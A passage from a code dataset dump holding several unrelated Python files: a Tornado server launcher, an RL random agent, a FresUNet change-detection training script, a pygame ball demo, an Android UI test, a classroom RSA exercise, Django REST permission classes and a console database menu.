get_scheduler\nfrom libs.confUtil import config\nport=int(config('system','port'))\n\ndef autoLoad():\n try:\n pt=os.path.join(os.path.dirname(__file__), \"apps\")\n apps=os.listdir(pt)\n apps.pop()\n urls=[]\n for _app in apps:\n __import__('apps.%s.handler'%_app)\n module=sys.modules['apps.%s.handler'%_app]\n for _handler in (getattr(module,'handler')):\n urls.append(_handler)\n return urls\n except Exception as e:\n raise ValueError('路由加载失败')\n\ndef run_main():\n urls=autoLoad()\n app = tornado.web.Application(handlers=urls)\n app.listen(port)\n tornado.ioloop.IOLoop.current().start()\n\ndef cronJob():\n '示例'\n schedule = get_scheduler()\n #schedule.add_job(cron_query, 'interval', seconds=60)\n #schedule.start()\n\n\n\nif __name__ == \"__main__\":\n workers=3\n with concurrent.futures.ProcessPoolExecutor(max_workers=workers) as executor:\n\n run_main()\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239692099","text":"from __future__ import print_function\r\n\r\nimport sys\r\nimport getopt\r\nimport rl_env\r\nimport random\r\n\r\nclass Runner(object):\r\n\t\"\"\"Runner class.\"\"\"\r\n\tdef __init__(self, numAgents, numEpisodes):\r\n\t\tself.eps = numEpisodes\r\n\t\tself.players = numAgents\r\n\t\tself.env = rl_env.make(num_players=numAgents)\r\n\t\t\r\n\r\n\tdef run(self):\r\n\t\trewards = []\r\n\t\tfor eps in range(self.eps):\r\n\t\t\tprint('Running episode: %d' % eps)\r\n\r\n\t\t\tobs = self.env.reset() # Observation of all players\r\n\r\n\t\t\tdone = False\r\n\t\t\teps_reward = 0\r\n\r\n\t\t\twhile not done:\r\n\t\t\t\tfor player in range(self.players):\r\n\t\t\t\t\tob = obs['player_observations'][player]\r\n\t\t\t\t\taction = random.choice(ob['legal_moves'])\r\n\t\t\t\t\tprint('Agent: {} action: {}'.format(obs['current_player'], action))\r\n\t\t\t\t\tobs, reward, done, _ = self.env.step(action)\r\n\t\t\t\t\teps_reward += reward\r\n\t\t\trewards.append(eps_reward)\r\n\t\t\t\r\n\t\tprint('Max Reward: %.3f' % max(rewards))\r\n\r\nif 
__name__ == \"__main__\":\r\n\trunner = Runner(2,1)\r\n\trunner.run()","sub_path":"custom_randomAgent.py","file_name":"custom_randomAgent.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"242474402","text":"\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.autograd import Variable\nimport torchvision.transforms as tr\n\n# Models\nfrom models.fresunet import FresUNet\n\n# Other\nimport os\nimport numpy as np\nimport random\nfrom skimage import io\nfrom scipy.ndimage import zoom\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm as tqdm\n\nimport time\nimport warnings\nfrom pprint import pprint\n\nfrom data import ChangeDetectionDataset, RandomFlip, RandomRot\n\n\n\ndef test(loader, criterion, net):\n\n net.eval()\n tot_loss = 0\n tot_count = 0\n\n class_correct = list(0. for i in range(2))\n class_total = list(0. for i in range(2))\n class_accuracy = list(0. for i in range(2))\n tp = 0\n tn = 0\n fp = 0\n fn = 0\n\n for batch in loader:\n I1 = batch['I1'].float().cuda()\n I2 = batch['I2'].float().cuda()\n label = torch.squeeze(batch['label'].cuda())\n\n output = net(I1, I2)\n\n loss = criterion(output, label.long())\n tot_loss += loss.data * np.prod(label.size())\n _, predicted = torch.max(output.data, 1)\n c = (predicted.int() == label.data.int())\n tot_count += np.prod(label.size())\n\n for i in range(c.size(1)):\n for j in range(c.size(2)):\n l = int(label.data[0, i, j])\n class_correct[l] += c[0, i, j]\n class_total[l] += 1\n\n pr = (predicted.int() > 0).cpu().numpy()\n gt = (label.data.int() > 0).cpu().numpy()\n\n tp += np.logical_and(pr, gt).sum()\n tn += np.logical_and(np.logical_not(pr), np.logical_not(gt)).sum()\n fp += np.logical_and(pr, np.logical_not(gt)).sum()\n fn += np.logical_and(np.logical_not(pr), gt).sum()\n\n net_loss = tot_loss / tot_count\n net_accuracy = 100 * (tp + tn) / tot_count\n for i in range(2):\n class_accuracy[i] = 100 * class_correct[i] / max(class_total[i], 0.00001)\n prec = tp / (tp + fp)\n rec = tp / (tp + fn)\n f_meas = 2 * prec * rec / (prec + rec)\n prec_nc = tn / (tn + fn)\n rec_nc = tn / (tn + fp)\n\n pr_rec = [prec, rec, f_meas, prec_nc, rec_nc]\n\n return net_loss, net_accuracy, class_accuracy, pr_rec\n\n\ndef train(n_epochs, net, criterion, save=True):\n t = np.linspace(1, n_epochs, n_epochs)\n\n epoch_train_loss = 0 * t\n epoch_train_accuracy = 0 * t\n epoch_train_change_accuracy = 0 * t\n epoch_train_nochange_accuracy = 0 * t\n epoch_train_precision = 0 * t\n epoch_train_recall = 0 * t\n epoch_train_Fmeasure = 0 * t\n epoch_test_loss = 0 * t\n epoch_test_accuracy = 0 * t\n epoch_test_change_accuracy = 0 * t\n epoch_test_nochange_accuracy = 0 * t\n epoch_test_precision = 0 * t\n epoch_test_recall = 0 * t\n epoch_test_Fmeasure = 0 * t\n\n best_fm = 0\n\n best_lss = 1000\n\n optimizer = torch.optim.Adam(net.parameters(), weight_decay=1e-4)\n\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, 0.95)\n\n for epoch_index in tqdm(range(n_epochs)):\n net.train()\n print('Epoch: ' + str(epoch_index + 1) + ' of ' + str(N_EPOCHS))\n\n # Train loop\n for batch in train_loader:\n I1 = batch['I1'].float().cuda()\n I2 = batch['I2'].float().cuda()\n label = torch.squeeze(batch['label'].cuda())\n\n optimizer.zero_grad()\n output = net(I1, I2)\n loss = criterion(output, label.long())\n loss.backward()\n optimizer.step()\n\n scheduler.step()\n\n # Eval\n epoch_train_loss[epoch_index], 
epoch_train_accuracy[epoch_index], cl_acc, pr_rec = test(train_loader, criterion, net)\n epoch_train_nochange_accuracy[epoch_index] = cl_acc[0]\n epoch_train_change_accuracy[epoch_index] = cl_acc[1]\n epoch_train_precision[epoch_index] = pr_rec[0]\n epoch_train_recall[epoch_index] = pr_rec[1]\n epoch_train_Fmeasure[epoch_index] = pr_rec[2]\n\n epoch_test_loss[epoch_index], epoch_test_accuracy[epoch_index], cl_acc, pr_rec = test(test_loader, criterion, net)\n epoch_test_nochange_accuracy[epoch_index] = cl_acc[0]\n epoch_test_change_accuracy[epoch_index] = cl_acc[1]\n epoch_test_precision[epoch_index] = pr_rec[0]\n epoch_test_recall[epoch_index] = pr_rec[1]\n epoch_test_Fmeasure[epoch_index] = pr_rec[2]\n\n fm = epoch_train_Fmeasure[epoch_index]\n if fm > best_fm:\n best_fm = fm\n save_str = 'net-best.pth.tar'\n torch.save(net.state_dict(), save_str)\n\n lss = epoch_train_loss[epoch_index]\n if lss < best_lss:\n best_lss = lss\n save_str = 'net-best.pth.tar'\n torch.save(net.state_dict(), save_str)\n\n print(\"train loss:\", epoch_train_loss[epoch_index],\n \"train nochange acc:\", epoch_train_nochange_accuracy[epoch_index],\n \"train change acc:\", epoch_train_change_accuracy[epoch_index])\n\n print(\"test loss:\", epoch_test_loss[epoch_index],\n \"test nochange acc:\", epoch_test_nochange_accuracy[epoch_index],\n \"test change acc:\", epoch_test_change_accuracy[epoch_index])\n\n\n out = {'train_loss': epoch_train_loss[-1],\n 'train_accuracy': epoch_train_accuracy[-1],\n 'train_nochange_accuracy': epoch_train_nochange_accuracy[-1],\n 'train_change_accuracy': epoch_train_change_accuracy[-1],\n 'test_loss': epoch_test_loss[-1],\n 'test_accuracy': epoch_test_accuracy[-1],\n 'test_nochange_accuracy': epoch_test_nochange_accuracy[-1],\n 'test_change_accuracy': epoch_test_change_accuracy[-1]}\n\n print('pr_c, rec_c, f_meas, pr_nc, rec_nc')\n print(pr_rec)\n\n return out\n\n\ndef save_test_results(dset):\n for name in tqdm(dset.names):\n with warnings.catch_warnings():\n I1, I2, cm = dset.get_img(name)\n I1 = torch.unsqueeze(I1, 0).float().cuda()\n I2 = torch.unsqueeze(I2, 0).float().cuda()\n out = net(I1, I2)\n _, predicted = torch.max(out.data, 1)\n I = np.stack((255*cm,255*np.squeeze(predicted.cpu().numpy()),255*cm),2)\n io.imsave(f'{net_name}-{name}.png',I)\n\n\n# -\n# Hyperparams\nBATCH_SIZE = 32\nPATCH_SIDE = 96\nN_EPOCHS = 50\nPATH_TO_DATASET = '/raid/users/ebarnett/OneraImages/'\nTRAIN_STRIDE = int(PATCH_SIDE/2) - 1\nTYPE = 3 # 0-RGB | 1-RGBIr | 2-All bands s.t. 
resulution <= 20m | 3-All bands\nLOAD_TRAINED = False\n\n# -\n# Datasets\ntrain_dataset = ChangeDetectionDataset(PATH_TO_DATASET, train=True, stride=TRAIN_STRIDE, transform=tr.Compose([RandomFlip(), RandomRot()]))\ntrain_loader = DataLoader(train_dataset, batch_size = BATCH_SIZE, shuffle = True, num_workers = 4)\n\nweights = torch.FloatTensor(train_dataset.weights).cuda()\n\ntest_dataset = ChangeDetectionDataset(PATH_TO_DATASET, train = False, stride = TRAIN_STRIDE)\ntest_loader = DataLoader(test_dataset, batch_size = BATCH_SIZE, shuffle = True, num_workers = 4)\n\n\n# -\n# Model\nnet, net_name = FresUNet(2*13, 2), 'FresUNet'\nnet.cuda()\n\n# -\n# Loss\ncriterion = nn.NLLLoss(weight=weights) # to be used with logsoftmax output\n\n\n# -\n# Training\n# net.load_state_dict(torch.load('net-best_epoch-1_fm-0.7394933126157746.pth.tar'))\n\nif LOAD_TRAINED:\n net.load_state_dict(torch.load('net_final.pth.tar'))\n print('LOAD OK')\nelse:\n t_start = time.time()\n out_dic = train(n_epochs=50, net=net, criterion=criterion)\n t_end = time.time()\n print(out_dic)\n print('Elapsed time:')\n print(t_end - t_start)\n torch.save(net.state_dict(), 'net_final.pth.tar')\n print('SAVE OK')\n\n# -\n# Eval by plotting\nt_start = time.time()\nsave_test_results(test_dataset)\nt_end = time.time()\nprint('Elapsed time: {}'.format(t_end - t_start))","sub_path":"train_fresunet.py","file_name":"train_fresunet.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180066153","text":"from datetime import timezone, timedelta\n\n\ndef to_utc(when):\n utc = timezone(timedelta(hours=0))\n return when.astimezone(utc)\n\n\ndef minutes_since_equinox(when):\n b = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30]\n days = (sum(b[0:when.month]) + when.day - 81) % 365\n hours = when.hour % 24\n minutes = when.minute\n return days*1440 + hours*60 + minutes\n","sub_path":"utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"587872259","text":"__author__ = 'catears'\n# Henrik 'catears' Adolfsson\n# henad221@student.liu.se\n\n\"\"\"\nExample context with balls that move randomly\n\"\"\"\n\nimport random\n\nfrom context import EmptyContext\n\n\ndef outside_l(circle):\n return circle['pos'][0] - circle['r'] <= 0\n\n\ndef outside_r(circle):\n return circle['pos'][0] + circle['r'] >= g.width\n\n\ndef outside_u(circle):\n return circle['pos'][1] - circle['r'] <= 0\n\n\ndef outside_d(circle):\n return circle['pos'][1] + circle['r'] >= g.height\n\n\ndef update_movement(circle):\n if outside_l(circle) and circle['movement'][0] < 0:\n circle['movement'][0] *= -1\n elif outside_r(circle) and circle['movement'][0] > 0:\n circle['movement'][0] *= -1\n\n if outside_u(circle) and circle['movement'][1] < 0:\n circle['movement'][1] *= -1\n elif outside_d(circle) and circle['movement'][1] > 0:\n circle['movement'][1] *= -1\n\n\ndef make_circle(a, b, c, e):\n return {\n 'color': a,\n 'pos': b,\n 'r': c,\n 'movement': e\n }\n\n\ndef make_random_circle():\n movement = [random.randint(-5, 5), random.randint(-5, 5)]\n r, gr, b = random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)\n radius = random.randint(20, 50)\n pos = [random.randint(10, g.width-(radius+10)), random.randint(10, g.height-(radius+10))]\n return make_circle((r,gr,b), pos, radius, movement)\n\n\n##########################################\n# Exported 
Context #\n##########################################\n\nimport pygame\nimport g\nimport polygon\n\n\nclass BallContext(EmptyContext):\n\n def __init__(self, *args, **kwargs):\n super(BallContext, self).__init__(*args, **kwargs)\n self.circles = [make_random_circle()]\n self.background = pygame.Surface(g.size)\n self.background.fill(g.background_rgb)\n\n def act(self, keymap):\n g.screen.blit(self.background, (0, 0))\n\n for circle in self.circles:\n\n circle['pos'][0] += circle['movement'][0]\n circle['pos'][1] += circle['movement'][1]\n \n if keymap.hold('u') and not outside_u(circle):\n circle['pos'][1] -= g.push_factor\n if keymap.hold('d') and not outside_d(circle):\n circle['pos'][1] += g.push_factor\n if keymap.hold('l') and not outside_l(circle):\n circle['pos'][0] -= g.push_factor\n if keymap.hold('r') and not outside_r(circle):\n circle['pos'][0] += g.push_factor\n\n update_movement(circle)\n pygame.draw.circle(g.screen, circle['color'], circle['pos'], circle['r'])\n \n if keymap.press('space'):\n self.circles.append(make_random_circle())\n\n if keymap.press('lshift'):\n keymap.set('switch')\n return polygon.PolygonContext()\n\n def setup(self):\n pass","sub_path":"example_contexts/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463848291","text":"from Android.fengzhuang.Android_Function import *\r\nfrom Android.fengzhuang.Android_FatherClass import *\r\nimport os\r\n\r\npackageName=readConfigInfo('uc','package')\r\nactivityName=readConfigInfo('uc','activity')\r\n'''指定输入法'''\r\ncommand2 ='adb shell ime set com.sohu.inputmethod.sogouoem/.SogouIME'\r\nos.system(command2)\r\ndriver =getDriver(packageName,activityName)\r\nf=Father(driver)\r\n\r\nwait(5)\r\n\r\nf.swipe_num(4)\r\n\r\n'''滑动后页面'''\r\nele_loc=(\"class name\",\"android.widget.LinearLayout\")\r\nlist=f.find_elements_loc(ele_loc)\r\nprint(len(list))\r\ncontents=driver.contexts\r\nprint(contents)\r\n#输入框\r\n\r\ninputTextBef_loc=(\"name\",\"搜索感兴趣的内容\")\r\ninputBefEle=f.find_element_loc(inputTextBef_loc)#跳转前输入框\r\ninputBefEle.click()\r\n\r\n'''跳转过后页面元素重新定位'''\r\nwait(4)\r\n\r\ninputTextAft_loc=(\"name\",\"搜索或输入网址\")\r\n# inputAftEle=f.find_element_loc(inputTextAft_loc)\r\n# inputAftEle.click()\r\n# wait(4)\r\n# driver.keyevent('45')\r\n# wait(2)\r\n# driver.keyevent('66')\r\n#\r\n\r\n# f.send_keys(inputTextAft_loc,'11111')\r\n\r\n\r\n\r\n","sub_path":"UIAutoTest-master/yoyotest/Android/Page/Page_UC.py","file_name":"Page_UC.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"466082391","text":"#!/usr/bin/env python\n\nimport random\nfrom utils import readFile, writeFile\n\n\n# Maior Divisor Comum de x e y\ndef gcd(x, y):\n if y == 0:\n return x\n else:\n return gcd(y, x % y)\n\n\n# Algoritmo Extendido de Euclide\n# Calcula os coeficientes, tal que: ax + by = gcd(a, b)\ndef xgcd(a, b):\n x, x1 = 0, 1\n y, y1 = 1, 0\n\n if a == 0:\n return b, x, y\n\n while b != 0:\n quotient = a // b\n a, b = b, a - quotient * b\n x1, x = x, x1 - quotient * x\n y1, y = y, y1 - quotient * y\n\n return a, x1, y1\n\n\ndef isPrime(x):\n if x == 2: # Se for 2, n é primo\n return True\n if x < 2 or x % 2 == 0:\n return False\n for n in range(3, int(x**0.5)+2, 2):\n if x % n == 0:\n return False\n return True\n\n\ndef calculateE(phi):\n while True:\n e = random.randrange(1, phi)\n g = gcd(e, phi)\n if g == 1:\n return 
e\n\n\ndef calculateD(e, phi):\n g, x, y = xgcd(e, phi)\n if x < 0:\n return x + phi\n else:\n return x\n\n\ndef createKeys(p, q):\n if not (isPrime(p) and isPrime(q)):\n raise ValueError(\"P e Q devem ser primos\")\n elif p == q:\n raise ValueError(\"P e Q não podem ser iguais\")\n\n n = p * q\n phi = (p-1)*(q-1)\n\n e = calculateE(phi)\n\n d = calculateD(e, phi)\n\n return f\"{e}\\n{n}\", f\"{d}\\n{n}\"\n\n\ndef decipher(ciphertext):\n private_key_path = \"./private-key.txt\"\n with open(private_key_path) as file:\n key = file.readline()\n n = file.readline()\n lines = ciphertext.split(\"\\n\")\n n_lines = len(lines)\n deciphered = \"\"\n for i in range(n_lines-1):\n line = lines[i]\n aux = int(line) ** int(key)\n c = aux % int(n)\n deciphered += chr(c)\n\n return deciphered\n\n\ndef main():\n print(\"\\n#===== Decifragem RSA =====#\")\n\n option = None\n while True:\n print(\"1 - Gerar Chaves\")\n print(\"2 - Decifrar Texto\")\n option = input(\"Escolha: \")\n if (option == \"1\"):\n # Criar chaves publicas e privadas\n print(\"#=== Gerando Chaves ===#\")\n public_key, private_key = createKeys(151, 139)\n\n writeFile(\"./public-key.txt\", public_key)\n writeFile(\"./private-key.txt\", private_key)\n print(f\"Chave pública escrita em public-key.txt\")\n print(f\"Chave privada escrita em private-key.txt\")\n break\n elif(option == \"2\"):\n cipher_text_path = input(\"Caminho do texto cifrado: \")\n cipher_text = readFile(cipher_text_path)\n deciphered_text = decipher(cipher_text)\n print(f\"Texto decifrado escrito para ./textos/texto-decifrado.txt\")\n writeFile(\"./textos/texto-decifrado.txt\", deciphered_text)\n break\n\n\nmain()\n","sub_path":"rsa/decipher.py","file_name":"decipher.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649799376","text":"from rest_framework import permissions\nfrom rest_framework.relations import ManyRelatedField\n\nfrom django.http import QueryDict\n\nfrom workflow.models import *\nfrom indicators.models import *\nfrom formlibrary.models import *\n\n\nclass IsSuperUserBrowseableAPI(permissions.BasePermission):\n\n def has_permission(self, request, view):\n if request.user.is_authenticated():\n if view.__class__.__name__ == 'APIRootView':\n return request.user.is_superuser\n else:\n return True\n return False\n\n\nclass UserIsOwnerOrAdmin(permissions.BasePermission):\n\n def has_permission(self, request, view):\n if view.action == 'list':\n return request.user.is_authenticated()\n elif view.action == 'create':\n return True\n elif view.action in ['retrieve', 'update', 'partial_update', 'destroy']:\n return True\n else:\n return False\n\n def check_object_permission(self, user, obj):\n return (user and user.is_authenticated() and\n (user.is_staff or obj == user))\n\n def has_object_permission(self, request, view, obj):\n return self.check_object_permission(request.user, obj)\n\n\nclass IsOrgMember(permissions.BasePermission):\n def has_permission(self, request, view):\n if request.user.is_superuser:\n return True\n\n if view.action == 'create':\n user_org = request.user.tola_user.organization\n\n if 'organization' in request.data:\n org_serializer = view.serializer_class().get_fields()[\n 'organization']\n primitive_value = request.data.get('organization')\n org = org_serializer.run_validation(primitive_value)\n return org == user_org\n\n return True\n\n def has_object_permission(self, request, view, obj):\n \"\"\"\n Object level permissions are used to 
determine if a user\n should be allowed to act on a particular object\n \"\"\"\n\n if request.user.is_superuser:\n return True\n user_groups = request.user.groups.values_list('name', flat=True)\n org_admin = True if ROLE_ORGANIZATION_ADMIN in user_groups else False\n\n user_org = request.user.tola_user.organization\n try:\n if obj.__class__ in [Sector, ProjectType, SiteProfile, Frequency,\n FundCode, DisaggregationType, Level,\n ExternalService, StrategicObjective,\n StakeholderType, ProfileType, Contact,\n ApprovalType, Distribution, CustomForm,\n CodedField, IssueRegister, Award, Milestone,\n Portfolio, WorkflowLevel1]:\n return obj.organization == user_org\n elif obj.__class__ in [Objective, Beneficiary, Documentation,\n CollectedData, WorkflowLevel2,\n WorkflowLevel2Sort]:\n return obj.workflowlevel1.organization == user_org\n elif obj.__class__ in [Checklist, Budget, RiskRegister]:\n return obj.workflowlevel2.workflowlevel1.organization == \\\n user_org\n elif obj.__class__ in [Organization]:\n return obj == user_org\n elif obj.__class__ in [WorkflowTeam]:\n if org_admin:\n return obj.workflow_user.organization == user_org\n else:\n return obj.workflowlevel1.organization == user_org\n elif obj.__class__ in [Indicator]:\n return obj.workflowlevel1.filter(\n organization=user_org).exists()\n except AttributeError:\n pass\n return False\n\n\nclass AllowTolaRoles(permissions.BasePermission):\n def has_permission(self, request, view):\n if request.user.is_superuser:\n return True\n user_groups = request.user.groups.values_list('name', flat=True)\n\n queryset = self._queryset(view)\n model_cls = queryset.model\n if view.action == 'create':\n user_org = request.user.tola_user.organization\n\n if 'workflowlevel1' in request.data:\n wflvl1_serializer = view.serializer_class().get_fields()[\n 'workflowlevel1']\n\n # Check if the field is Many-To-Many or not\n if wflvl1_serializer.__class__ == ManyRelatedField and \\\n isinstance(request.data, QueryDict):\n primitive_value = request.data.getlist('workflowlevel1')\n else:\n primitive_value = request.data.get('workflowlevel1')\n\n # Get objects using their URLs\n wflvl1 = wflvl1_serializer.run_validation(primitive_value)\n\n # We use a list to fetch the program teams\n if not isinstance(wflvl1, list):\n wflvl1 = [wflvl1]\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1__in=wflvl1).values_list(\n 'role__name', flat=True)\n\n if model_cls in [Contact, CustomForm, Documentation, Indicator,\n Level, CollectedData, Objective,\n WorkflowLevel2]:\n return ((ROLE_VIEW_ONLY not in team_groups or\n ROLE_ORGANIZATION_ADMIN in user_groups) and\n all(x.organization == user_org for x in wflvl1))\n elif model_cls is WorkflowTeam:\n return (((ROLE_VIEW_ONLY not in team_groups and\n ROLE_PROGRAM_TEAM not in team_groups) or\n ROLE_ORGANIZATION_ADMIN in user_groups) and\n all(x.organization == user_org for x in wflvl1))\n\n elif model_cls is Portfolio:\n return ROLE_ORGANIZATION_ADMIN in user_groups\n\n return True\n\n def _queryset(self, view):\n \"\"\"\n Return the queryset of the view\n :param view:\n :return: QuerySet\n \"\"\"\n assert hasattr(view, 'get_queryset') \\\n or getattr(view, 'queryset', None) is not None, (\n 'Cannot apply {} on a view that does not set '\n '`.queryset` or have a `.get_queryset()` method.'\n ).format(self.__class__.__name__)\n\n if hasattr(view, 'get_queryset'):\n queryset = view.get_queryset()\n assert queryset is not None, (\n '{}.get_queryset() returned None'.format(\n 
view.__class__.__name__)\n )\n return queryset\n return view.queryset\n\n def has_object_permission(self, request, view, obj):\n \"\"\"\n Object level permissions are used to determine if a user\n should be allowed to act on a particular object\n \"\"\"\n if request.user and request.user.is_authenticated():\n if request.user.is_superuser:\n return True\n user_groups = request.user.groups.values_list('name', flat=True)\n if ROLE_ORGANIZATION_ADMIN in user_groups:\n return True\n\n queryset = self._queryset(view)\n model_cls = queryset.model\n if model_cls is Portfolio:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1__portfolio=obj).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups or ROLE_PROGRAM_TEAM in \\\n team_groups:\n return view.action == 'retrieve'\n elif model_cls is WorkflowTeam:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=obj.workflowlevel1).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n else:\n return view.action == 'retrieve'\n elif model_cls is WorkflowLevel1:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=obj).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n elif ROLE_PROGRAM_TEAM in team_groups:\n return view.action != 'destroy'\n elif model_cls is Indicator:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1__indicator=obj).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n elif ROLE_PROGRAM_TEAM in team_groups:\n return view.action != 'destroy'\n elif ROLE_VIEW_ONLY in team_groups:\n return view.action == 'retrieve'\n elif model_cls in [CollectedData, Level, WorkflowLevel2]:\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=obj.workflowlevel1).values_list(\n 'role__name', flat=True)\n if ROLE_PROGRAM_ADMIN in team_groups:\n return True\n elif ROLE_PROGRAM_TEAM in team_groups:\n return view.action != 'destroy'\n elif ROLE_VIEW_ONLY in team_groups:\n return view.action == 'retrieve'\n elif model_cls is CustomForm:\n if obj.created_by == request.user:\n if 'workflowlevel1' in request.data:\n serializer = view.serializer_class().get_fields()[\n 'workflowlevel1']\n wflvl1 = serializer.run_validation(request.data.get(\n 'workflowlevel1'))\n team_groups = WorkflowTeam.objects.filter(\n workflow_user=request.user.tola_user,\n workflowlevel1=wflvl1).values_list(\n 'role__name', flat=True)\n return ROLE_VIEW_ONLY not in team_groups\n return True\n else:\n return False\n else:\n return True\n\n return False\n","sub_path":"feed/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":10795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"564094761","text":"import simplejson as json\nimport json\n\nwith open('keys.json') as fileObject:\n\tfileContents = fileObject.read()\n\tr = json.loads(fileContents)\ndef trance(formatted):\n\tj=0\n\twhile True:\n\t\ta=r['values'][j]['from']\n\t\tif formatted in a:\n\t\t\tout=r['values'][j]['to']\n\t\t\t#print(r['values'][j]['to'])\n\t\t\treturn 
out\n\t\t\tbreak\n\t\tj+=1","sub_path":"ng_exceptions/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"138632459","text":"from consolemenu import SelectionMenu\n\nimport model\nimport view\nimport scanner\n\n\nclass Controller:\n def __init__(self):\n self.model = model.Model()\n self.view = view.View()\n\n self.tables = list(model.TABLES.keys())\n\n def get_table_name(self, index):\n try:\n return self.tables[index]\n except IndexError:\n return None\n\n def show_start_menu(self, subtitle='', **kwargs):\n menu_options = self.tables + ['Знайти майстрів за типом процедур',\n 'Знайти процедури за типом клієнтів',\n 'Повнотекстовий пошук (слово не входить)',\n 'Повнотекстовий пошук (ціла фраза)',\n 'Створити 10 000 рандомних майстрів']\n next_steps = [self.show_table_menu] * len(self.tables) + [\n self.get_masters_by_procedures,\n self.get_procedure_by_client_type,\n self.fts_without_word,\n self.fts_phrase,\n self.create_random_masters\n ]\n menu = SelectionMenu(menu_options, subtitle=subtitle,\n title=\"Оберіть таблицю або дію:\")\n menu.show()\n\n index = menu.selected_option\n if index < len(menu_options):\n table_name = self.get_table_name(index)\n next_step = next_steps[index]\n try:\n next_step(table_name=table_name)\n except Exception as err:\n self.show_start_menu(subtitle=str(err))\n else:\n print('Пака!!!!')\n\n def show_table_menu(self, table_name, subtitle=''):\n next_steps = [self.get, self.insert, self.update, self.delete, self.show_start_menu]\n menu = SelectionMenu(\n ['GET', 'INSERT', 'UPDATE', 'DELETE'], subtitle=subtitle,\n title=f'Обрано таблицю `{table_name}`', exit_option_text='Назад', )\n menu.show()\n\n next_step = next_steps[menu.selected_option]\n next_step(table_name=table_name)\n\n def get(self, table_name):\n filter_by = scanner.input_dict(table_name, 'За чим фільтрувати запит? 
Залиште пустим щоб отримати всі рядки:')\n data = self.model.get(table_name, **filter_by)\n self.view.print_entities(table_name, data)\n scanner.press_enter()\n self.show_table_menu(table_name)\n\n def insert(self, table_name):\n new_values = scanner.input_dict(table_name, 'Введіть нові значення:')\n self.model.insert(table_name, **new_values)\n self.show_table_menu(table_name, 'Вставка відбулася успішно')\n\n def update(self, table_name):\n filter_by = scanner.input_dict(table_name, 'Який рядок треба змінити?:', limit=1)\n new_values = scanner.input_dict(table_name, 'Введіть нові значення:')\n self.model.update(table_name, list(filter_by.items())[0], **new_values)\n self.show_table_menu(table_name, 'Оновлення відбулося успішно')\n\n def delete(self, table_name):\n filter_by = scanner.input_dict(table_name, 'Які рядки треба видалити?')\n self.model.delete(table_name, **filter_by)\n self.show_table_menu(table_name, 'Видалення відбулося успішно')\n\n def get_masters_by_procedures(self, **kwargs):\n procedures = scanner.input_simple('Через кому введіть процедури:').split(',')\n procedures = [p.strip() for p in procedures]\n data = self.model.get_masters_by_procedures(procedures)\n self.view.print_entities(f'Майстри які робили процедури={procedures}', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def get_procedure_by_client_type(self, **kwargs):\n is_vip = scanner.input_simple('Чи є клієнт ВІПом?').lower() in ('t', 'true', '+', 'yes', 'y')\n data = self.model.get_procedure_by_client_type(is_vip)\n self.view.print_entities(\n f'Процедури які робили клієнти віп={is_vip}', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def fts_without_word(self, **kwargs):\n word = scanner.input_simple('Яке слово має бути відсутнє у документі?')\n data = self.model.fts_without_word(word)\n self.view.print_entities(f'Документи, в яких немає слова `{word}`', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def fts_phrase(self, **kwargs):\n phrase = scanner.input_simple('Введіть фразу, за якою хочете здійснити повнотекстовий пошук:')\n data = self.model.fts_phrase(phrase)\n self.view.print_entities(f'Документи, в яких є фраза `{phrase}`', data)\n scanner.press_enter()\n self.show_start_menu()\n\n def create_random_masters(self, **kwargs):\n self.model.create_random_masters()\n self.show_start_menu('10 000 випадкових майстрів додано')\n","sub_path":"sem1/lab2/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"526441786","text":"import serial\nimport time\n\nclass Arm:\n\n def __init__(self):\n self.elapsed_time = 0\n self.ser = serial.Serial(\"/dev/ttyACM0\", 9600)\n 